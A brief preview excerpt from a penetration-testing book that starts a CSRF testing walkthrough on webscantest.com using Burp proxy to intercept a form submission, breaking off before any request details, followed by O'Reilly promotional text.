CSRF – An End-to-End Example

Let's take another look at a CSRF vulnerability on webscantest.com. Here's the form we'll be testing:

Simple enough. Fire up the Burp proxy and make sure the Intercept feature is on, let's fill in the form with a nice test value:

As a sidenote, Cyan is really cool  in the subtractive color system, Cyan is a primary color and can be created by removing red from white light. Let's submit this form and then check back with Burp to see the intercepted request:

OK, noting the important information  the HTTP request ...

Get Hands-On Bug Hunting for Penetration Testers now with O’Reilly online learning.

O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.